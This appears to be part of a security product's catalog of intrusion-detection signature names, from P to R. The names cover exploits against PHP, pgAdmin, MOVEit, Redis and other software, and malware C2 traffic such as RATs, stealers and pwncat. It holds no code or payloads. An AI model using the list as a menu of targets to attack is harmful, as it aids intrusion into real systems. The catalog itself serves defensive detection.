Pentaho-Business-Server-Server-Side-Template-Injection-CVE-2022-43769
Percent-Encoded-Ascii-Control-Characters
Perl-Archive-Tar-Arbitrary-File-Overwrite
Perl-Archive-Zip-Arbitrary-File-Overwrite
Perl-Obfuscator-Code
Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101
Perseus-Trojan-Infection-Traffic
Persistent-Systems-Radia-Client-Automation-Command-Execution
Persits-Xupload-ActiveX-Buffer-Overflow
PetitPotam-NTLM-Relay-Attack
Pfsense-Authenticated-Group-Member-Remote-Command-Execution
Pfsense-Post-Auth-Group-Member-Command-Execution
Pfsense-Webconfigurator-Firewall_Aliases_Edit.php-Input-Validation-Error
Pfsense-Webgui-Zone-Parameter-Cross-Site-Scripting
Pgadmin-Authenticated-Remote-Code-Execution-CVE-2023-5002
Pgadmin-Binary-Path-API-RCE
Pgadmin-Import-Servers-Directory-Traversal-CVE-2023-0241
Pgadmin-Pga4_session-Directory-Traversal
Pgadmin-Query-Tool-Authenticated-RCE-CVE-2025-2945
Pgadmin-Validate_Binary_Path-CVE-2024-3116-Remote-Code-Execution
Pgadmin-Validate_Binary_Path-Remote-Code-Execution
PGP-Key-File
Phamm-Helpers.php-Cross-Site-Scripting
Phatbot-Trojan
Phishing-Related-URL
Phishing-Script_Detected
Phishing-Template-Detected
Phoenix-Contact-Automationworx-Plcopen-Xml-Stack-Buffer-Overflow
Phorum-SQL-read.php3
PHP-4-Unserialize-ZVAL-Reference-Counter-Overflow
Php-Addslashes-Null-Character-Parsing-Error
PHP-apache_request_headers-Function-Buffer-Overflow
Php-Arbitrary-Location-File-Upload
Php-cfgProgDir-Parameter-File-Inclusion
Php-Cgi-Query-String-Information-Disclosure
PHP-Cgi-Remote-Code-Execution
Php-Cgi-Remote-Code-Execution-CVE-2024-4577
Php-Chart-Wizards-Url-Remote-Code-Execution
Php-Core-Unserialize-Function-Integer-Overflow
Php-Core-Unserialize-Key-Name-Use-After-Free
Php-Core-Unserialize-Process-Nested-Data-Use-After-Free
Php-Dateinterval-Heap-Buffer-Overread-Denial-Of-Service
Php-Datetimezone-Object-Timezone-Unserialize-Type-Confusion
Php-DNS_Get_Record-Out-Of-Bounds-Read
PHP-Exception-Tostring-Denial-Of-Service
Php-EXIF-Extension-EXIF_Read_Data-Null-Pointer-Dereference
Php-EXIF-Extension-IFD_Make_Value-Thumbnail-Heap-Buffer-Overflow
Php-EXIF-Header-Parsing-Integer-Overflow
PHP-EXIF_Process_User_Comment-Null-Pointer-Dereference
Php-Fileinfo-Call-Stack-Exhaustion-Denial-Of-Service
Php-Fileinfo-CDF_Read_Property_Info-Denial-Of-Service
PHP-FPM-Init_request_info-Path_Info-Buffer-Underflow
Php-FTP_genlist-Method-Integer-Overflow
PHP-Fusion-Administration-Banner-Stored-Cross-Site-Scripting
PHP-Fusion-Downloads.php-Command-Injection
PHP-Gdimagecreatefromgifctx-Out-Of-Bounds-Read
Php-Group-Php-Zip-Integer-Overflow
Php-Htmlspecialchars-Htmlentities-Buffer-Overflow
PHP-HTTP-Multipart-Form-Data-Denial-Of-Service
Php-HTTP-POST-File-Upload-Buffer-Overflow
PHP-HTTP_Fopen_Wrapper-Stack-Buffer-Overflow
PHP-IMAP-Open-RCE
Php-LDAP-Denial-Of-Service
Php-Libmagic-Portable-Executable-Out-Of-Bounds-Memory-Access
Php-Memory-Limit-Code-Execution-Vulnerability
Php-Nuke-Referer-SQL-Injection
Php-Nuke-SQL-Injection
Php-OLE-File-Handling-Infinite-Loop
PHP-Payloads-Injected-In-PNG-Image
Php-PECL-Zip-URL-Wrapper-Buffer-Overflow
PHP-Phar-404-Page-Reflected-Cross-Site-Scripting
Php-Phar_Parse_pharfile-Function-Filename_Len-Property-Integer-Overflow
Php-Phar_Parse_Tarfile-Method-Integer-Overflow
PHP-Phar_Set_inode-Function-Archive-Processing-Stack-Buffer-Overflow
Php-Phpinfo-request
Php-Php_parserr-DNS-Txt-Heap-Buffer-Overflow
PHP-Php_Register_Variable_ex-Function-Code-Execution
Php-Probe-Script
Php-Quot-Print-Encode-Heap-Buffer-Overflow
PHP-Remote-File-Inclusion
Php-Reserved-Variable-In-Request
Php-Script-External-Command-Execution
Php-Suspicious-Include-Parameter
Php-Tar-File-Parsing-Uninitialized-Reference
Php-Unserialize-Call-Spl-Arrayobject-And-Splobjectstorage-Memory-Corruption
Php-Xml_Parse_Into_Struct-Heap-Memory-Corruption
Php-Zend_Hash_destroy-Uninitialized-Pointer-Code-Execution
PHP-Ziparchive-Getfromindex-And-Getfromname-Integer-Overflow
Phpbb-Sessions-Php-Autologinid-Authentication-Bypass
PhpFileManager-Cmd-Parameter-Command-Execution
Phpgacl-Acl_Admin-Reflected-Cross-Site-Scripting
PhpGedView-PGV-Base-Directory-Php-Injection
phpLDAPadmin-Remote-PHP-Code-Injection
PHPMailer-Mail-Escapeshellarg-Command-Injection
PHPMailer-Mail-Sender-Command-Injection
PHPMoAdmin-Remote-Code-Execution
Phpmyadmin-Index.php-Local-File-Inclusion
Phpmyadmin-Navigation-Tree-Stored-Cross-Site-Scripting
Phpmyadmin-Preg_Replace-Function-Code-Injection
Phpmyadmin-Searchcontroller-SQL-Injection
Phpmyadmin-Server_sync.php-Backdoor
Phpmyadmin-SQL-Goto-Remote-File-Include-Vulnerability
Phpmyadmin-Static-Code-Injection-Vulnerability-CVE-2009-1151
Phpmyadmin-Tbl_replace.php-Local-File-Inclusion
phpScheduleIt-PHP-Code-Injection-Vulnerability
PHPStudy-Backdoor-Remote-Code-Execution
PHPUnit-Remote-Code-Execution-CVE-2017-9841
PHPWAY-Link-Management-Script-Multiple-File-Inclusion-Vulnerabilities
Phpwiki-Ploticus-Remote-Code-Execution
Pi-Hole-Blocklist-OS-Command-Execution
Pi-Hole-DHCP-Mac-OS-Command-Execution
Pi-Hole-Top-Domains-API-Authenticated-Exec
Pi-Hole-Whitelist-OS-Command-Execution
Pi3Web-ISAPI-Denial-of-Service
PicoFlat-Pagina-Parameter-File-Inclusion
Pidgin-MSN-MSNP2P-Message-Integer-Overflow
Pihole-Blocklist-Exec-CVE-2020-11108
Pimcore-Gridhelperservice-SQL-Injection
Pimcore-Gridhelperservice.php-Preparelistingforgrid-SQL-Injection
Pimcore-Key-Field-Stored-Cross-Site-Scripting
Pimcore-Multiselect-Getfilterconditionext-SQL-Injection
Pimcore-Rest-API-SQL-Injection
Pimcore-Searchcontroller.PHP-SQL-Injection
Pimcore-Title-Field-Stored-Cross-Site-Scripting
Pimcore-Unserialize-RCE
Pineapp-Mail-Secure-Conflivelog.pl-Command-Injection
Pineapp-Mail-Secure-Confpremenu.php-Export-Log-Command-Injection
Pineapp-Mail-Secure-Confpremenu.php-Install-License-Command-Injection
Pineapp-Mail-Secure-Ldapsyncnow-Remote-Command-Execution
Pineapp-Mail-Secure-Livelog-Command-Injection
Pineapp-Mail-Secure-Test_li_connection.php-Command-Injection
PingPull-Trojan-C2-Traffic
Pinkslip-Bot
Pinkslipbot-Trojan
Piranha-Passwd-Php3-Sys-Compromise
Pivotal-RabbitMQ-X-reason-HTTP-Header-Denial-Of-Service
Pivotal-Spring-Framework-Iswritableproperty-Spel-Injection
Pivotal-Spring-Framework-Spring-Messaging-Module-STOMP-Remote-Code-Execution
Pivotal-Spring-Security-oauth-SpelView-Code-Execution
Piwigo-CVE-2023-26876-Gather-Credentials-Via-SQL-Injection
PlaySMS-Unauthenticated-Template-Injection-Code-Execution
Plex-Media-Server-Plugin-Unpickle-Dict-Windows-RCE
Plex-Media-Server-Reflection-DDoS-CVE-2021-33959
Plixer-Scrutinizer-Authentication-Bypass
PluginDetect
Plugx-Trojan-Activity-Detected
PmWiki-Remote-PHP-Code-Injection
PNG-GD-Graphics-Library-Rowbytes-And-Height-BOF
PolarBear-CMS-PHP-File-Upload
Poll-It-Cgi
Polycom-Shell-HDX-Series-Traceroute-Command-Execution
Ponmocup
Pony-Downloader-C2-Traffic
POP3-Cyrus-IMAP-Server-POP3-User-Command-Buffer-Overflow
POP3-E-Post-Mail-Server-POP3-Password-Disclosure-Buffer-Overflow
POP3-MailEnable-POP-Service-Pass-Command-Buffer-Overflow
POP3-MDaemon-POP3-Server-User-And-Apop-Commands-Buffer-Overflow
POP3-Qualcomm-QPopper-BOF
POP3-RevilloC-MailServer-Long-User-Command-Buffer-Overflow
Popmonster
Popper_Webmail_Remote_Code_Execution
PoPToP-PPTP-Server-Negative-Read-BOF
Portable-Executable-msstyles-File-Transfer
Portalscan
Possible-Cobalt-Strike-Response
Possible-Malicious-XML-Scriplet
Possible-Metasploit-Generated-Malicious-File-Detected
Possible-Vice-Society-PowerShell-Data-Exfiltration-Traffic
Possibly-Malicious-Certificate-File
Poster-Software-Publish-It-Pui-File-Processing-Buffer-Overflow
Postfix-IPv6-Relaying-Security-Issue
Postfix-SASL-Auth-Handle-Reuse-Memory-Corruption
PostgreSQL-Bit-Substring-Buffer-Overflow
PostgreSQL-Database-Core-Server-Non-libpq-Client-Policy-Bypass
PostgreSQL-Database-Datetime-Buffer-Overflow
PostgreSQL-Database-Geo_Ops-Path_In-Integer-Overflow
PostgreSQL-Database-Password-Change-Stack-Buffer-Overflow
PostgreSQL-Database-Set-Role-Security-Bypass
PostgreSQL-Insecure-Library-Mapping-Vulnerability
Potentially-Malicious-SYLK-File
PowerD-WHATIDO-Format-String
PowerDNS-Authoritative-Server-CVE-2021-36754-DoS
PowerDNS-Authoritative-Server-DNS-Packet-Processing-Denial-Of-Service
PowerDNS-Authoritative-Server-Dot-Character-Denial-Of-Service
PowerDNS-Nameserver-Label-Decompression-Denial-Of-Service
PowerDNS-Recursor-Denial-Of-Service
PowerShell-In-Office-Document
PPLive-Media-Transfer
PPStream-ActiveX-Control-Logo-Parameter-Buffer-Overflow
PPStream-Media-Transfer
PPStream-P2P-Internet-TV
PPTP-Microsoft-Start-Control-Request-Buffer-Overflow
Precisionpop
Predator-The-Thief-C2-Traffic
Printer-Sun-Solaris-Printd-File-Deletion
Pro-Server-EX-Denial-Of-Service
ProFTP-Banner-Remote-Buffer-Overflow
ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow
ProFTPD-Mod-Copy-Arbitrary-File-Upload
ProFTPD-Mod_Copy-Remote-File-Copying
ProFTPD-Mod_Copy-Unauthenticated-Remote-File-Copying
Progea-Movicon-11-Server-Denial-Of-Service
Progea-Movicon-EIDP-Denial-Of-Service
Progea-Movicon-Negative-Content-Length-Buffer-Overflow
Progress-Flowmon-Command-Injection-CVE-2024-2389
Progress-Kemp-Loadmaster-Addselectedrs-And-Addselectedvs-Command-Injection
Progress-Kemp-Loadmaster-Logging-Command-Injection-CVE-2024-56131
Progress-Kemp-Loadmaster-Mangle-Stack-Based-Buffer-Overflow-CVE-2025-1758
Progress-Kemp-Loadmaster-Read_Pass-Command-Injection
Progress-Kemp-Loadmaster-Rest-API-Command-Injection
Progress-MOVEit-Authentication-Bypass-CVE-2024-5806
Progress-MOVEit-Externaltokenauthenticator-Denial-Of-Service
Progress-MOVEit-Transfer-Folderlistrecursive-SQL-Injection
Progress-MOVEit-Transfer-Moveitisapi-X-Silock-Fileid-SQL-Injection
Progress-MOVEit-Transfer-Silcerttouser-SQL-Injection
Progress-MOVEit-Transfer-SQL-Injection-CVE-2023-34362
Progress-MOVEit-Transfer-Userengine-Usercheckclientcert-SQL-Injection
Progress-MOVEit-Transfer-Userprocesspasschangerequest-SQL-Injection
Progress-Telerik-Report-Server-Authentication-Bypass-CVE-2024-4358
Progress-WhatsUp-Gold-AppProfileImport-Unrestricted-File-Upload
Progress-WhatsUp-Gold-Communitycontroller-Unrestricted-File-Upload
Progress-WhatsUp-Gold-Getfilewithoutzip-Directory-Traversal
Progress-WhatsUp-Gold-GetSqlWhereClause-SQL-Injection-CVE-2024-46906
Progress-WhatsUp-Gold-Onmessage-Insecure-Deserialization-CVE-2024-5016
Progress-WhatsUp-Gold-SnmpExtendedActiveMonitor-Directory-Traversal
Progress-WhatsUp-Gold-SQL-Injection-CVE-2024-6670
Progress-WhatsUp-Gold-Testcontroller-Chart-Denial-Of-Service-Vulnerability
Progress-WhatsUp-Gold-Testcontroller-Information-Disclosure-Vulnerabilities
Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-46909
Progress-WhatsUp-Gold-Writedatafile-Directory-Traversal-CVE-2024-4883
Progress-WS_FTP-Server-Ad-Hoc-Transfer-Insecure-Deserialization
ProjectSend-Improper-Authentication-CVE-2024-11680
PROMOTIC-Directory-Traversal
ProSafe-Management-System-Arbitrary-File-Upload-Vulnerability
ProSysInfo-TFTP-Server-TFTPDWIN-Stack-Based-Buffer-Overflow
Provectus-UI-For-Apache-Kafka-Jmx-Insecure-Deserialization
Proxy-Pro-Professional-GateKeeper-Buffer-Overflow
ProZilla-FTPSearch-Buffer-Overflow
PRTG-CVE-2023-32781-Authenticated-RCE
PRTG-Network-Monitor-Authenticated-RCE-CVE-2018-9276
PRTG-Network-Monitor-Local-File-Inclusion-CVE-2018-19410
Psd-Imagemagick-Psd-File-Channel-Buffer-Vulnerability
PsExec-Named-Pipe-Detected
PSO-Proxy-v0.91-Stack-Buffer-Overflow
PTC-IsoView-ActiveX-Control-Multiple-Methods-Buffer-Overflow
PTC-IsoWiew-ActiveX-Control-ViewPort-Heap-Buffer-Overflow
Pulse-Connect-Secure-Remote-Code-Execution-CVE-2021-22893
Pulse-Connect-Secure-Template-Injection
Pulse-Secure-Cross_Site_Script_Inclusion
Pulse-Secure-Diag.cgi-Command-Injection
Pulse-Secure-Downloadlicenses.cgi-Command-Injection-CVE-2020-8218
Pulse-Secure-SSL-VPN-Cross-Site-Scripting
Pulse-Secure-SSL-VPN-Pre-Auth-Arbitrary-File-Reading
Pulse-Secure-SSL-VPN-Stack-Buffer-Overflow
Pulse-Secure-VPN-Arbitrary-Command-Execution
Pulse-Secure-VPN-Arbitrary-File-Disclosure
Pulse-Secure-VPN-Gzip-RCE
PurpleFox-EK-Exploit-Redirect-Page
Pushbot-Bot
Pushdo-Spambot
pwncat-Traffic
pyLoad-js2py-Python-Execution
pyLoad-RCE-With-js2py-Sandbox-Escape
Python-Rot13-File-Encoding
Python-Script-With-Base64-Obfuscation-Pattern
Python-SSL-X.509-Distributionpoint-Extension-Null-Pointer-Dereference
PyTorch-Model-Server-Registration-And-Deserialization-RCE
Pyxie-RAT-Infection-Traffic
Qakbot-Botnet
Qbik-WinGate-WWW-Proxy-Server-Stack-Based-Buffer-Overflow
qdPM-9.1-Authenticated-Arbitrary-PHP-File-Upload
Qemu-Monitor-HMP-Migrate-Command-Execution
Qemu-VNC-Set_Pixel_Format-Bits_Per_Pixel-Null-Pointer-Dereference
Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-41265
Qlik-Sense-HTTP-Request-Tunneling-CVE-2023-48365
Qlik-Sense-Path-Traversal-CVE-2023-41266
QLogic-SANsurfer-FC-HBA-Manager-Directory-Traversal
QNAP-Hbs-3-Hybrid-Backup-Sync-Command-Injection
QNAP-Multiple-Products-Hls_Tmp-Directory-Traversal
QNAP-Multiple-Products-Log-Upload-Command-Injection
QNAP-Multiple-Products-Privwizard-Username-Command-Injection
QNAP-Photo-Station-Externally-Controlled-Reference-To-A-Resource-CVE-2022-27593
QNAP-Photo-Station-Path-Traversal-Vulnerability-CVE-2019-7194
QNAP-Q-Center-Virtual-Appliance-Change_Passwd-Command-Execution
QNAP-QTS-QuTS-hero-Command-Injection-CVE-2023-47218
QNAP-Remote-Code-Execution-CVE-2024-27130
QNAP-Transcode-Server-Command-Execution
QNAP-Viostor-NVR-Command-Injection-CVE-2023-47565
QNX-Phrelay-DoS
QNX-QCONN-Denial-Of-Service
Qognify-Ocularis-Eventcoordinator-Insecure-Deserialization
Qt-BMP-Handling-Buffer-Overflow
Quagga-Aspath_Put-BGP-Session-Drop-Denial-Of-Service
Quagga-BGP-Daemon-BGP_Capability_Msg_Parse-Denial-Of-Service
Quagga-BGP-Daemon-Notify-Attribute-Out-Of-Bounds-Read
Quagga-Daemon-BGP_Update_Receive-Double-Free
Quagga-Vty-Interface-Denial-Of-Service
Qualcomm-WorldMail-IMAP-Literal-Counter-Parsing-Buffer-Overflow
Qualcomm-WorldMail-IMAP-Server-Directory-Traversal
Quest-Intrust-Annotation-Objects-ActiveX-Control-Index-Out-Of-Bounds
Quest-Kace-Systems-Management-Command-Injection
Quest-Kace-Systems-Management-Run_Cross_Report-SQL-Injection
Quest-Kace-Systems-Management-Run_Report-Command-Injection
Quest-NetVault-Backup-Export-Arbitrary-File-Overwrite
Quest-NetVault-Backup-Multipart-Request-Checksession-Authentication-Bypass
Quest-NetVault-Backup-Multipart-Request-Part-Header-Stack-Buffer-Overflow
Quest-NetVault-Smartdisk-Libnvbasics.dll-Denial-Of-Service
Quest-Privilege-Manager-pmmasterd-Buffer-Overflow
Quic-go-Crypto-Ack-Nil-Pointer-Dereference
QuickTime-Darwin-Streaming-Server-Buffer-Overflow
Quikstore-Shopping-Cart-Disclose-Info
Raccoon-Stealer-Infection-Traffic
Racer-Buffer-Overflow
Ralio-Remote-File-Include-Input-Validation
Rancher-Server-Docker-Exploit
Rank-Math-Wordpress-SEO-Plugin-Updatemeta-Rest-Endpoint-Access-Control-Weakness
RapidShare-File-Sharing-Service
Raptor-Train-Malware-Activity
RARLAB-UnRAR-Extractunixlink50-Directory-Traversal
RARLAB-WinRAR-ACE-Directory-Traversal
RARLAB-WinRAR-ACE-Remote-Code-Execution
RARLAB-WinRAR-File-Extension-Spoofing-Vulnerability
RARLAB-WinRAR-Recovery-Volume-Out-Of-Bounds-Write
RARLAB-WinRAR-Zip-File-Out-of-Bounds-Read
RaspAP-Unauthenticated-Command-Injection
RaspberryMatic-Unauthenticated-RCE-Vulnerability-Through-HMServer-File-Upload
Ray-Agent-Job-RCE-CVE-2023-48022
Ray-OS-Command-Injection-Via-Format-Parameter-CVE-2023-6019
rConfig-Ajaxarchivefiles.php-Command-Injection
rConfig-Ajaxserversettingschk.php-Command-Injection
rConfig-Commands.inc.php-SQL-Injection
rConfig-Compliancepolicies.PHP-SQL-Injection
rConfig-Compliancepolicies_PHP-SQL-Injection
rConfig-Devices.inc.php-SQL-Injection
rConfig-Install-Command-Execution
rConfig-Network-Device-Configuration-Ajaxcomparegetcmddates-SQL-Injection
rConfig-Network-Device-Configuration-Tool-Ajaxaddtemplate.php-Command-Injection
rConfig-Network-Device-Configuration-Tool-Configdevice.php-Cross-Site-Scripting
rConfig-Network-Device-Configuration-Tool-DeviceMgmt-Cross-Site-Scripting
rConfig-Network-Device-Configuration-Vendor-Arbitrary-File-Upload
rConfig-Remote-Code-Execution-CVE-2019-16662
rConfig-Search.crud.php-Command-Injection
rConfig-Vendors-Authenticated-File-Upload-RCE
Rdesktop-Process_Redirect_PDU-BSS-Overflow
RDP-ActiveX-Control-Remote-Code-Execution-Vulnerability
RDP_Microsoft-Remote-Desktop-Client-Vulnerability-MS09-044
RDS.Dataspace-ActiveX-Control-Remote-Code-Execution
RDStealer-Malware-C2-Traffic
RealFlex-RealWin-FC_RFUSER_FCS_Login-Buffer-Overflow
RealFlex-RealWin-FC_Script_FCS_STARTPROG-Buffer-Overflow
RealFlex-RealWin-Multiple-Buffer-Overflows
RealFlex-RealWin-SCADA-Scpc_Initialize-Buffer-Overflow
RealFlex-RealWin-Tag-Manipulation-Buffer-Overflow
RealNetworks-Helix-Server-NTLM-Authentication-Heap-Overflow
RealNetworks-Helix-Server-RN5auth-Credential-Parsing-Buffer-Overflow
RealNetworks-Helix-Server-RTSP-Describe-Heap-Buffer-Overflow
RealNetworks-Helix-Server-RTSP-GET-Long-URI
RealNetworks-Helix-Server-RTSP-Set-Parameters-Request-DoS
RealNetworks-Helix-Server-RTSP-Setup-Request-Denial-Of-Service
RealNetworks-Helix-Server-RTSP-Setup-Stack-Buffer-Overflow
RealNetworks-Helix-Server-RTSP-Set_Parameter-Heap-Buffer-Overflow
RealNetworks-Helix-Server-SNMP-Master-Agent-Open-PDU-DOS
RealNetworks-Helix-Transport-Header-Overflow
RealNetworks-Helix-Universal-Server-Denial-Of-Service-Vulnerability
RealNetworks-Helix-Universal-Server-RTSP-Describe-BOF
RealNetworks-RealGames-StubbyUtil-ProcessMgr-ActiveX-Command-Execution
RealNetworks-RealPlayer-ActiveX-Import-Method-Buffer-Overflow
RealNetworks-RealPlayer-CDDA-URI-Uninitialized-Pointer-Code-Execution
RealNetworks-RealPlayer-FLV-Parsing-Two-Integer-Overflow-Vulnerabilities
RealNetworks-RealPlayer-Ivr-Handling-Heap-Buffer-Overflow
RealNetworks-RealPlayer-Mp3-Files-Processing-Buffer-Overflow
RealNetworks-RealPlayer-MPEG-Width-Integer-Underflow-Memory-Corruption
RealNetworks-RealPlayer-Playlist-Handling-Buffer-Overflow
RealNetworks-RealPlayer-Qcp-Parsing-Buffer-Overflow
RealNetworks-RealPlayer-RecordClip-Parameter-Injection
RealNetworks-RealPlayer-rmoc3260.dll-ActiveX-Control-Memory-Corruption
RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow
RealNetworks-RealPlayer-Rmp-File-Stack-Buffer-Overflow
RealNetworks-RealPlayer-SMIL-XSS
RealNetworks-RealPlayer-SWF-Flash-File-Buffer-Overflow
RealNetworks-RealPlayer-URL-Parsing-Stack-Buffer-Overflow
RealNetworks-RealPlayer-WAV-File-Processing-Buffer-Overflow
RealNetworks-SMIL-Wallclock-Stack-Overflow
RealPlayer-Malformed-RM-File-Heap-Overflow
RealPlayer-Url-Parsing-Buffer-Overflow
RealPlayer-Vidplin.dll-AVI-Header-Parsing-Code-Execution
Realtek-Media-Player-Playlist-Buffer-Overflow
Realtek-SDK-formSysCmd-Command-Execution-CVE-2021-35395
Realtek-SDK-formWsc-Command-Injection-CVE-2021-35395
Realtek-SDK-Miniigd-OS-Command-Injection
Realtek-SDK-MP-Daemon-UDPServer-Command-Injection-CVE-2021-35394
Realtek-SDK-SIP-ALG-Buffer-Overflow
Realtek-SDK-Stack-Buffer-Overflow-Vulnerabilities-CVE-2021-35395
Realtek-SDK-UPnP-Callback-Stack-Buffer-Overflow-CVE-2021-35392
RealVNC-Authentication-Bypass
RealVNC-Server-ClientCutText-Message-Memory-Corruption
Recslurp-Botnet
Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service
Red-Hat-389-Directory-Server-NS-Slapd-ldapsearch-Buffer-Overflow
Red-Hat-389-Directory-Server-Server-Side-Sort-Denial-Of-Service
Red-Hat-389-Directory-Server-TLS-Resource-Exhaustion
Red-Hat-389-Directory-Server-Vslapd_Log_Emergency_Error-Denial-Of-Service
Red-Hat-Cachemgr-Cgi-Script
Red-Hat-CloudForms-Management-Engine-Directory-Traversal
Red-Hat-CloudForms-Management-Engine-SQL-Injection
Red-Hat-Directory-Server-Accept-Language-Parsing-Buffer-Overflow
Red-Hat-Enterprise-Linux-DNS-Resolver-Buffer-Overflow
Red-Hat-Installation-Package
Red-Hat-Jboss-Application-Server-Dofilter-Insecure-Deserialization
Red-Hat-Jboss-Bpm-Suite-Brms-Tasks-List-Cross-Site-Scripting
Red-Hat-Jboss-Data-Grid-Hotrod-Client-Insecure-Deserialization
Red-Hat-Jboss-Seam-Framework-Xxe-Information-Disclosure
Red-Hat-Jboss-Seam-Interfacegenerator-Information-Disclosure
Red-Hat-librelp-Stack-Buffer-Overflow
Red-Hat-Netkvm-Virtio-Win-GetXxpHeaderAndPayloadLen-Integer-Underflow
Red-Hat-Networkmanager-DHCP-Command-Injection
Red-Lion-Crimson-CD3-Itemindexlist-Type-Confusion
Red-Lion-Crimson-CD3-Port-List-Type-Confusion
Red-October
Redaeefe-Trojan-Infection-Traffic
Redgirl-Bot
Redhat-Jboss-Enterprise-Application-Platform-Jmx-Console-Authentication-Bypass
Redhat-Jboss-JNDI-Lack-of-Authentication
Redis-Getkeysusingkeyspecs-Heap-Buffer-Overflow
Redis-Hrandfield-Zrandmember-Command-Integer-Overflow
Redis-HyperLogLog-Hllcount-Stack-Buffer-Overflow
Redis-HyperLogLog-Hllsparsetodense-Heap-Buffer-Overflow
Redis-Lua-Sandbox-Escape-CVE-2022-0543
Redis-Lua-Scripting-Component-Getnum-Integer-Overflow
Redis-Msetnx-Command-Denial-Of-Service
Redis-Replication-Code-Execution
Redis-Scan-Keys-Command-Denial-Of-Service
Redis-Setrange-Sort-Command-Integer-Overflow
Redis-SSH-Authorized-Keys-Overwrite
Redis-Unauthenticated-Code-Execution
Redis-Xautoclaim-Command-Count-Integer-Overflow
Redline-Password-Stealer-Infection-Traffic
Redmine-Bazaar-Repository-Adapter-Command-Execution
Rejetto-HTTP-File-Server-(HFS)-Unauthenticated-RCE
Rejetto-HTTP-File-Server-Command-Injection-CVE-2024-39943
Rejetto-HttpFileServer-Remote-Command-Execution
Remcos-RAT-C2-Traffic
Remote-Code-Execution-Via-Cpio-In-Zimbra-Collaboration-Suite-CVE-2022-41352
Remote-Desktop-Code-Execution-Vulnerability
Remote-Desktop-Protocol-Vulnerability
Remote-Mouse-RCE
Remote-Registry-Service-Elevation-Of-Privilege-CVE-2024-43532
Reolink-Testemail-OS-Command-Injection-CVE-2019-11001
Reprise-License-Manager-Diagnostics_doit-Directory-Traversal
Reprise-License-Manager-Edit_lf_Get_Data-Directory-Traversal
Reprise-License-Manager-Edit_lf_Process-Directory-Traversal
Reprise-License-Manager-HTTP-Parameter-Parsing-Stack-Buffer-Overflow
Reprise-License-Manager-Multiple-HTTP-Parameters-Parsing-Buffer-Overflow
Responsive-File-Manager-Ajax_calls.php-Get_File-Directory-Traversal
Responsive-Filemanager-Ajax_calls.php-Information-Disclosure
Responsive-Filemanager-Ajax_calls.php-Zip-Directory-Traversal
RevCode-RAT-C2-Traffic
RevengeRAT-Malware-C2-Traffic
ReverseRAT-Infection-Traffic
Reveton-Botnet
Rhino-Software-Serv-U-FTP-Server-RNTO-Command-Directory-Traversal
Rhino-Software-Serv-U-Web-Client-Request-Remote-Buffer-Overflow
RichFaces-Framework-Expression-Language-Injection-CVE-2018-12533
RichFaces-Framework-Expression-Language-Injection-CVE-2018-14667
RKD-Software-BarCodeAx.dll-Buffer-Overflow
Rlpr-Msg-Format-Strings-Vulnerability
Rocket-Chat-Pre-Auth-Blind-NoSQL-Injection
Rocket-Servergraph-Admin-Center-Filerequestor-Del-Directory-Traversal
Rocket-Servergraph-Admin-Center-Filerequestor-Directory-Traversal
Rocket-Servergraph-Admin-Center-Filerequestor-Run-And-Runclear-Vulnerability
Rocket-Servergraph-Admin-Center-Userrequest-And-Tsmrequest-Command-Execution
Rockwell-Automation-CCW-ccwsln-External-Entity-Injection
Rockwell-Automation-Factorytalk-Rnadiagnosticssrv-Insecure-Deserialization
Rockwell-Automation-Factorytalk-SE-RCE
Rockwell-Automation-ISaGRAF-Workbench-7-ZIP-Directory-Traversal
Rockwell-Automation-Micrologix-PLC-Default-Credentials-CVE-2016-5645
Rockwell-Automation-Rslinx-Classic-Cip-Sendrrdata-Heap-Buffer-Overflow
Rockwell-Automation-Rslinx-Classic-Forward-Open-Electronic-Key-Stack-BOF
Rockwell-Automation-Rslinx-Ethernet-IP-SendUnitData-DoS
Rockwell-Automation-RSLogix-5000-RsvcHost.exe-Denial-Of-Service
Rockwell-Automation-Thinmanager-CVE-2023-27855-Directory-Traversal
Rockwell-Automation-Thinmanager-Denial-Of-Service-CVE-2023-27857
Rockwell-Automation-Thinmanager-Thinserver-API-Directory-Traversal
Rockwell-Automation-Thinmanager-Thinserver-Directory-Traversal
Rockwell-Automation-Thinmanager-Thinserver-Monitor-Thread-Out-Of-Bounds-Read
Rockwell-Automation-Thinmanager-Type-13-Synchronization-Integer-Overflow
Rockwell-Automation-Thinmanager-Type-17-Monitor-Missing-Authorization
Rockwell-Automation-Thinmanager-Type-21-Synchronization-Directory-Traversal
Rockwell-Automation-Thinmanager-Type-38-Synchronization-Directory-Traversal
Rockwell-Automation-Workbench-CCWARC-Insecure-Deserialization
Rockwell-RSLogix-Heap-Overflow-Vulnerability
Rompager-Rom0-Information-Disclosure
Roundcube-Webmail-Arbitrary-File-Read
Roundcube-Webmail-Archive-IMAP-Command-Injection
Roundcube-Webmail-Cascading-Style-Sheets-Filtering-Information-Disclosure
Roundcube-Webmail-Cross-Site-Scripting-CVE-2020-35730
Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting
Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting
Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008
Roundcube-Webmail-Linkref-Cross-Site-Scripting-CVE-2023-43770
Roundcube-Webmail-RCE-Via-Config-Setting-CVE-2020-12641
Roundcube-Webmail-SQL-Injection-CVE-2021-44026
Roundcube-Webmail-SVG-Animate-Stored-Cross-Site-Scripting
Roundcube-Webmail-XML-Attachment-Cross-Site-Scripting-CVE-2020-13965
Roxio-CinePlayer-Buffer-Overflow
Roxy-WI-Unauthenticated-Command-Injection-RCE
RPC-BOF-MS03-049
RPC-CA-BrightStor-Arcserve-Backup-Caloggerd.exe-Null-Hostname-DOS
RPC-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Denial-Of-Service
RPC-CA-BrightStor-Arcserve-Backup-Media-Server-Sun-RPC-Service-BOF
RPC-Cde-Dtspcd-Buffer-Overflow
RPC-CMSD-CREATE-Buffer-Overflow-Vulnerability
RPC-EMC-Legato-NetWorker-Remote-Exec-Service-Buffer-Overflow
RPC-Linux-Nfs_Mountd-Buffer-Overflow
RPC-MIT-Kerberos-Kadmind-RPC-Library-Unix-Authentication-Buffer-Overflow
RPC-Portmapper-Access
RPC-sadmind-ADM-Method-BOF
RPC-sadmind-BOF
